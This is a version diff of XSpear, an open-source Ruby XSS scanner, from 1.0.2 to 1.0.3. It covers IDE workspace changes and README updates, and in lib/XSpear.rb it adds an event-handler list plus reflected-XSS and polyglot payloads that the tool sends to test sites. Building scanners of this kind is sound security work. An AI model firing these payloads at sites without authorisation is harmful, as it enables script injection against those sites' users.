XSpear 1.0.2 → 1.0.3
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/.idea/workspace.xml +40 -28
- data/README.md +26 -4
- data/XSpear-1.0.2.gem +0 -0
- data/lib/XSpear/version.rb +1 -1
- data/lib/XSpear.rb +119 -5
- metadata +2 -1
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: f7f5c25b7930673a6a500037388b459cbf4e4da94a225c0dc647b1f4d13a956a
|
|
4
|
+
data.tar.gz: 29534ac5308419d4be687ed0d14c5eee69b4cae48c767e3d6433b1d12592cbe8
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 9e846d4845fc6af2ffbdc0775f0759213ed2c3fd7ea885e56f1dc5f419738e458395f9c293a698c2fd3faf1f19f55b33c34c9a87fb19159728e6e579a772a2b7
|
|
7
|
+
data.tar.gz: de1177287bd050790bed48176fddf8c798f4cc2d250d287937774e19616275901bac511fa8ed33bf03789e782aa4c68ba6e96bd39bf16577b001fbc6b4cb0c98
|
data/.idea/workspace.xml
CHANGED
|
@@ -3,7 +3,7 @@
|
|
|
3
3
|
<component name="ChangeListManager">
|
|
4
4
|
<list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
|
|
5
5
|
<change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
|
|
6
|
-
<change beforePath="$PROJECT_DIR$/XSpear
|
|
6
|
+
<change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
|
|
7
7
|
<change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
|
|
8
8
|
</list>
|
|
9
9
|
<option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
|
|
@@ -38,16 +38,20 @@
|
|
|
38
38
|
</provider>
|
|
39
39
|
</entry>
|
|
40
40
|
</file>
|
|
41
|
-
<file pinned="false" current-in-tab="
|
|
42
|
-
<entry file="file://$PROJECT_DIR$/
|
|
43
|
-
<provider selected="true" editor-type-id="text-editor"
|
|
41
|
+
<file pinned="false" current-in-tab="true">
|
|
42
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
|
|
43
|
+
<provider selected="true" editor-type-id="text-editor">
|
|
44
|
+
<state relative-caret-position="213">
|
|
45
|
+
<caret line="262" column="30" lean-forward="true" selection-start-line="262" selection-start-column="30" selection-end-line="262" selection-end-column="30" />
|
|
46
|
+
</state>
|
|
47
|
+
</provider>
|
|
44
48
|
</entry>
|
|
45
49
|
</file>
|
|
46
50
|
<file pinned="false" current-in-tab="false">
|
|
47
51
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
|
|
48
52
|
<provider selected="true" editor-type-id="text-editor">
|
|
49
|
-
<state>
|
|
50
|
-
<caret
|
|
53
|
+
<state relative-caret-position="194">
|
|
54
|
+
<caret line="13" lean-forward="true" selection-start-line="13" selection-end-line="13" />
|
|
51
55
|
</state>
|
|
52
56
|
</provider>
|
|
53
57
|
</entry>
|
|
@@ -70,11 +74,11 @@
|
|
|
70
74
|
</provider>
|
|
71
75
|
</entry>
|
|
72
76
|
</file>
|
|
73
|
-
<file pinned="false" current-in-tab="
|
|
77
|
+
<file pinned="false" current-in-tab="false">
|
|
74
78
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
|
|
75
79
|
<provider selected="true" editor-type-id="text-editor">
|
|
76
80
|
<state relative-caret-position="15">
|
|
77
|
-
<caret line="1" column="
|
|
81
|
+
<caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
|
|
78
82
|
</state>
|
|
79
83
|
</provider>
|
|
80
84
|
</entry>
|
|
@@ -108,12 +112,12 @@
|
|
|
108
112
|
<list>
|
|
109
113
|
<option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
|
|
110
114
|
<option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
|
|
111
|
-
<option value="$PROJECT_DIR$/lib/XSpear.rb" />
|
|
112
115
|
<option value="$PROJECT_DIR$/XSpear.gemspec" />
|
|
113
116
|
<option value="$PROJECT_DIR$/README.md" />
|
|
114
117
|
<option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
|
|
115
118
|
<option value="$PROJECT_DIR$/exe/XSpear" />
|
|
116
119
|
<option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
|
|
120
|
+
<option value="$PROJECT_DIR$/lib/XSpear.rb" />
|
|
117
121
|
</list>
|
|
118
122
|
</option>
|
|
119
123
|
</component>
|
|
@@ -226,7 +230,7 @@
|
|
|
226
230
|
<option name="presentableId" value="Default" />
|
|
227
231
|
<updated>1562942814778</updated>
|
|
228
232
|
<workItem from="1562942816004" duration="15337000" />
|
|
229
|
-
<workItem from="1563638656518" duration="
|
|
233
|
+
<workItem from="1563638656518" duration="3646000" />
|
|
230
234
|
</task>
|
|
231
235
|
<task id="LOCAL-00001" summary="init update">
|
|
232
236
|
<created>1562945899597</created>
|
|
@@ -389,11 +393,18 @@
|
|
|
389
393
|
<option name="project" value="LOCAL" />
|
|
390
394
|
<updated>1563646762017</updated>
|
|
391
395
|
</task>
|
|
392
|
-
<
|
|
396
|
+
<task id="LOCAL-00024" summary="Edit version , release 1.0.2">
|
|
397
|
+
<created>1563646850278</created>
|
|
398
|
+
<option name="number" value="00024" />
|
|
399
|
+
<option name="presentableId" value="LOCAL-00024" />
|
|
400
|
+
<option name="project" value="LOCAL" />
|
|
401
|
+
<updated>1563646850278</updated>
|
|
402
|
+
</task>
|
|
403
|
+
<option name="localTasksCounter" value="25" />
|
|
393
404
|
<servers />
|
|
394
405
|
</component>
|
|
395
406
|
<component name="TimeTrackingManager">
|
|
396
|
-
<option name="totallyTimeSpent" value="
|
|
407
|
+
<option name="totallyTimeSpent" value="18983000" />
|
|
397
408
|
</component>
|
|
398
409
|
<component name="ToolWindowManager">
|
|
399
410
|
<frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
|
|
@@ -439,7 +450,8 @@
|
|
|
439
450
|
<MESSAGE value="modify dependency rspec" />
|
|
440
451
|
<MESSAGE value="Change Badge(version)" />
|
|
441
452
|
<MESSAGE value="Add show version & edit help, version in banner" />
|
|
442
|
-
<
|
|
453
|
+
<MESSAGE value="Edit version , release 1.0.2" />
|
|
454
|
+
<option name="LAST_COMMIT_MESSAGE" value="Edit version , release 1.0.2" />
|
|
443
455
|
</component>
|
|
444
456
|
<component name="editorHistoryManager">
|
|
445
457
|
<entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
|
|
@@ -452,23 +464,9 @@
|
|
|
452
464
|
<entry file="file://$PROJECT_DIR$/bin/console">
|
|
453
465
|
<provider selected="true" editor-type-id="text-editor" />
|
|
454
466
|
</entry>
|
|
455
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
|
|
456
|
-
<provider selected="true" editor-type-id="text-editor">
|
|
457
|
-
<state relative-caret-position="1740">
|
|
458
|
-
<caret line="116" column="19" selection-start-line="116" selection-start-column="19" selection-end-line="116" selection-end-column="19" />
|
|
459
|
-
</state>
|
|
460
|
-
</provider>
|
|
461
|
-
</entry>
|
|
462
467
|
<entry file="file://$PROJECT_DIR$/bin/setup">
|
|
463
468
|
<provider selected="true" editor-type-id="text-editor" />
|
|
464
469
|
</entry>
|
|
465
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
|
|
466
|
-
<provider selected="true" editor-type-id="text-editor">
|
|
467
|
-
<state>
|
|
468
|
-
<caret column="9" selection-start-column="9" selection-end-column="23" />
|
|
469
|
-
</state>
|
|
470
|
-
</provider>
|
|
471
|
-
</entry>
|
|
472
470
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
|
|
473
471
|
<provider selected="true" editor-type-id="text-editor">
|
|
474
472
|
<state relative-caret-position="195">
|
|
@@ -513,10 +511,24 @@
|
|
|
513
511
|
</state>
|
|
514
512
|
</provider>
|
|
515
513
|
</entry>
|
|
514
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
|
|
515
|
+
<provider selected="true" editor-type-id="text-editor">
|
|
516
|
+
<state relative-caret-position="194">
|
|
517
|
+
<caret line="13" lean-forward="true" selection-start-line="13" selection-end-line="13" />
|
|
518
|
+
</state>
|
|
519
|
+
</provider>
|
|
520
|
+
</entry>
|
|
516
521
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
|
|
517
522
|
<provider selected="true" editor-type-id="text-editor">
|
|
518
523
|
<state relative-caret-position="15">
|
|
519
|
-
<caret line="1" column="
|
|
524
|
+
<caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
|
|
525
|
+
</state>
|
|
526
|
+
</provider>
|
|
527
|
+
</entry>
|
|
528
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
|
|
529
|
+
<provider selected="true" editor-type-id="text-editor">
|
|
530
|
+
<state relative-caret-position="213">
|
|
531
|
+
<caret line="262" column="30" lean-forward="true" selection-start-line="262" selection-start-column="30" selection-end-line="262" selection-end-column="30" />
|
|
520
532
|
</state>
|
|
521
533
|
</provider>
|
|
522
534
|
</entry>
|
data/README.md
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
# XSpear
|
|
2
2
|
XSpear is XSS Scanner on ruby gems
|
|
3
3
|
|
|
4
|
-
<img src="https://img.shields.io/static/v1.svg?label=lang&message=ruby&color=RED"> <img src="https://img.shields.io/gem/v/XSpear.svg"> <img src="https://img.shields.io/gem/
|
|
4
|
+
<img src="https://img.shields.io/static/v1.svg?label=lang&message=ruby&color=RED"> <img src="https://img.shields.io/gem/v/XSpear.svg"> <img src="https://img.shields.io/gem/dt/XSpear.svg"> <img src="https://img.shields.io/github/license/hahwul/XSpear.svg"> <a href="https://twitter.com/intent/follow?screen_name=hahwul"><img src="https://img.shields.io/static/v1.svg?label=follow&message=hahwul&color=black"></a>
|
|
5
5
|
|
|
6
6
|
## Key features
|
|
7
7
|
- Pattern matching based XSS scanning
|
|
@@ -23,7 +23,7 @@ Install it yourself as:
|
|
|
23
23
|
|
|
24
24
|
Or install it yourself as (local file):
|
|
25
25
|
|
|
26
|
-
$ gem install XSpear-
|
|
26
|
+
$ gem install XSpear-{version}.gem
|
|
27
27
|
|
|
28
28
|
Add this line to your application's Gemfile:
|
|
29
29
|
|
|
@@ -66,8 +66,15 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
|
|
|
66
66
|
+ v=2 : show scanning log
|
|
67
67
|
+ v=3 : show detail log(req/res)
|
|
68
68
|
-h, --help Prints this help
|
|
69
|
-
--
|
|
69
|
+
--version Show XSpear version
|
|
70
|
+
--update Update with online
|
|
70
71
|
```
|
|
72
|
+
### Result types
|
|
73
|
+
- (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
|
|
74
|
+
- (V)UNL: Vulnerable XSS, Checked alert/prompt/confirm with Selenium
|
|
75
|
+
- (L)OW: Low level issue
|
|
76
|
+
- (M)EDIUM: medium level issue
|
|
77
|
+
- (H)IGH: high level issue
|
|
71
78
|
|
|
72
79
|
### Case by Case
|
|
73
80
|
**Scanning XSS**
|
|
@@ -213,6 +220,21 @@ class ScanCallbackFunc()
|
|
|
213
220
|
end
|
|
214
221
|
```
|
|
215
222
|
|
|
223
|
+
## Update
|
|
224
|
+
if nomal user
|
|
225
|
+
```
|
|
226
|
+
$ gem update XSpear
|
|
227
|
+
```
|
|
228
|
+
|
|
229
|
+
if developers (soft)
|
|
230
|
+
```
|
|
231
|
+
$ git pull -v
|
|
232
|
+
```
|
|
233
|
+
if develpers (hard)
|
|
234
|
+
```
|
|
235
|
+
$ git reset --hard HEAD; git pull -v
|
|
236
|
+
```
|
|
237
|
+
|
|
216
238
|
## Development
|
|
217
239
|
|
|
218
240
|
After checking out the repo, run `bin/setup` to install dependencies. Then, run `rake spec` to run the tests. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
|
|
@@ -232,5 +254,5 @@ The gem is available as open source under the terms of the [MIT License](https:/
|
|
|
232
254
|
Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).
|
|
233
255
|
|
|
234
256
|
## ScreenShot
|
|
235
|
-
<img src="https://user-images.githubusercontent.com/13212227/
|
|
257
|
+
<img src="https://user-images.githubusercontent.com/13212227/61582619-ed233700-ab67-11e9-94f7-33cb6af5997c.png" width=100%>
|
|
236
258
|
<img src="https://user-images.githubusercontent.com/13212227/61311071-8b459300-a830-11e9-8e60-c08e984fdacb.png" width=100%>
|
data/XSpear-1.0.2.gem
ADDED
|
Binary file
|
data/lib/XSpear/version.rb
CHANGED
data/lib/XSpear.rb
CHANGED
|
@@ -128,9 +128,116 @@ class XspearScan
|
|
|
128
128
|
|
|
129
129
|
def run
|
|
130
130
|
r = []
|
|
131
|
+
event_handler = [
|
|
132
|
+
'onAbort',
|
|
133
|
+
'onActivate',
|
|
134
|
+
'onAfterPrint',
|
|
135
|
+
'onAfterUpdate',
|
|
136
|
+
'onBeforeActivate',
|
|
137
|
+
'onBeforeCopy',
|
|
138
|
+
'onBeforeCut',
|
|
139
|
+
'onBeforeDeactivate',
|
|
140
|
+
'onBeforeEditFocus',
|
|
141
|
+
'onBeforePaste',
|
|
142
|
+
'onBeforePrint',
|
|
143
|
+
'onBeforeUnload',
|
|
144
|
+
'onBeforeUpdate',
|
|
145
|
+
'onBegin',
|
|
146
|
+
'onBlur',
|
|
147
|
+
'onBounce',
|
|
148
|
+
'onCellChange',
|
|
149
|
+
'onChange',
|
|
150
|
+
'onClick',
|
|
151
|
+
'onContextMenu',
|
|
152
|
+
'onControlSelect',
|
|
153
|
+
'onCopy',
|
|
154
|
+
'onCut',
|
|
155
|
+
'onDataAvailable',
|
|
156
|
+
'onDataSetChanged',
|
|
157
|
+
'onDataSetComplete',
|
|
158
|
+
'onDblClick',
|
|
159
|
+
'onDeactivate',
|
|
160
|
+
'onDrag',
|
|
161
|
+
'onDragEnd',
|
|
162
|
+
'onDragLeave',
|
|
163
|
+
'onDragEnter',
|
|
164
|
+
'onDragOver',
|
|
165
|
+
'onDragDrop',
|
|
166
|
+
'onDragStart',
|
|
167
|
+
'onDrop',
|
|
168
|
+
'onEnd',
|
|
169
|
+
'onError',
|
|
170
|
+
'onErrorUpdate',
|
|
171
|
+
'onFilterChange',
|
|
172
|
+
'onFinish',
|
|
173
|
+
'onFocus',
|
|
174
|
+
'onFocusIn',
|
|
175
|
+
'onFocusOut',
|
|
176
|
+
'onHashChange',
|
|
177
|
+
'onHelp',
|
|
178
|
+
'onInput',
|
|
179
|
+
'onKeyDown',
|
|
180
|
+
'onKeyPress',
|
|
181
|
+
'onKeyUp',
|
|
182
|
+
'onLayoutComplete',
|
|
183
|
+
'onLoad',
|
|
184
|
+
'onLoseCapture',
|
|
185
|
+
'onMediaComplete',
|
|
186
|
+
'onMediaError',
|
|
187
|
+
'onMessage',
|
|
188
|
+
'onMouseDown',
|
|
189
|
+
'onMouseEnter',
|
|
190
|
+
'onMouseLeave',
|
|
191
|
+
'onMouseMove',
|
|
192
|
+
'onMouseOut',
|
|
193
|
+
'onMouseOver',
|
|
194
|
+
'onMouseUp',
|
|
195
|
+
'onMouseWheel',
|
|
196
|
+
'onMove',
|
|
197
|
+
'onMoveEnd',
|
|
198
|
+
'onMoveStart',
|
|
199
|
+
'onOffline',
|
|
200
|
+
'onOnline',
|
|
201
|
+
'onOutOfSync',
|
|
202
|
+
'onPaste',
|
|
203
|
+
'onPause',
|
|
204
|
+
'onPopState',
|
|
205
|
+
'onProgress',
|
|
206
|
+
'onPropertyChange',
|
|
207
|
+
'onReadyStateChange',
|
|
208
|
+
'onRedo',
|
|
209
|
+
'onRepeat',
|
|
210
|
+
'onReset',
|
|
211
|
+
'onResize',
|
|
212
|
+
'onResizeEnd',
|
|
213
|
+
'onResizeStart',
|
|
214
|
+
'onResume',
|
|
215
|
+
'onReverse',
|
|
216
|
+
'onRowsEnter',
|
|
217
|
+
'onRowExit',
|
|
218
|
+
'onRowDelete',
|
|
219
|
+
'onRowInserted',
|
|
220
|
+
'onScroll',
|
|
221
|
+
'onSeek',
|
|
222
|
+
'onSelect',
|
|
223
|
+
'onSelectionChange',
|
|
224
|
+
'onSelectStart',
|
|
225
|
+
'onStart',
|
|
226
|
+
'onStop',
|
|
227
|
+
'onStorage',
|
|
228
|
+
'onSyncRestored',
|
|
229
|
+
'onSubmit',
|
|
230
|
+
'onTimeError',
|
|
231
|
+
'onTrackChange',
|
|
232
|
+
'onUndo',
|
|
233
|
+
'onUnload',
|
|
234
|
+
'onURLFlip'
|
|
235
|
+
]
|
|
236
|
+
|
|
131
237
|
log('s', 'creating a test query.')
|
|
132
238
|
r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
|
|
133
239
|
r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
|
|
240
|
+
# Check Special Chat
|
|
134
241
|
r.push makeQueryPattern('f', 'XsPeaR>', 'XsPeaR>', 'i', "not filtered "+">".blue, CallbackStringMatch)
|
|
135
242
|
r.push makeQueryPattern('f', '<XsPeaR', '<XsPeaR', 'i', "not filtered "+"<".blue, CallbackStringMatch)
|
|
136
243
|
r.push makeQueryPattern('f', 'XsPeaR"', 'XsPeaR"', 'i', "not filtered "+'"'.blue, CallbackStringMatch)
|
|
@@ -151,14 +258,21 @@ class XspearScan
|
|
|
151
258
|
r.push makeQueryPattern('f', 'XsPeaR-', 'XsPeaR-', 'i', "not filtered "+"-".blue, CallbackStringMatch)
|
|
152
259
|
r.push makeQueryPattern('f', 'XsPeaR=', 'XsPeaR=', 'i', "not filtered "+"=".blue, CallbackStringMatch)
|
|
153
260
|
r.push makeQueryPattern('f', 'XsPeaR$', 'XsPeaR$', 'i', "not filtered "+"$".blue, CallbackStringMatch)
|
|
261
|
+
# Check Event Handler
|
|
262
|
+
r.push makeQueryPattern('f', '<xspear/onhwul=64>', 'onhwul=64', 'i', "not filtered event handler "+"on{any} pattern".blue, CallbackStringMatch)
|
|
263
|
+
event_handler.each do |ev|
|
|
264
|
+
r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue, CallbackStringMatch)
|
|
265
|
+
end
|
|
154
266
|
r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
155
267
|
r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
156
268
|
r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
157
|
-
r.push makeQueryPattern('x', '"><
|
|
158
|
-
r.push makeQueryPattern('x', '
|
|
159
|
-
r.push makeQueryPattern('x', '
|
|
160
|
-
r.push makeQueryPattern('x', '
|
|
161
|
-
r.push makeQueryPattern('x', '
|
|
269
|
+
r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
270
|
+
r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered "+"<script>alert(45)</script>".red, CallbackXSSSelenium)
|
|
271
|
+
r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered "+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
|
|
272
|
+
r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
|
|
273
|
+
r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
|
|
274
|
+
r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//--><<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
|
|
275
|
+
r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
|
|
162
276
|
r = r.flatten
|
|
163
277
|
r = r.flatten
|
|
164
278
|
log('s', "test query generation is complete. [#{r.length} query]")
|
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: XSpear
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 1.0.
|
|
4
|
+
version: 1.0.3
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- hahwul
|
|
@@ -157,6 +157,7 @@ files:
|
|
|
157
157
|
- LICENSE.txt
|
|
158
158
|
- README.md
|
|
159
159
|
- Rakefile
|
|
160
|
+
- XSpear-1.0.2.gem
|
|
160
161
|
- XSpear.gemspec
|
|
161
162
|
- bin/console
|
|
162
163
|
- bin/setup
|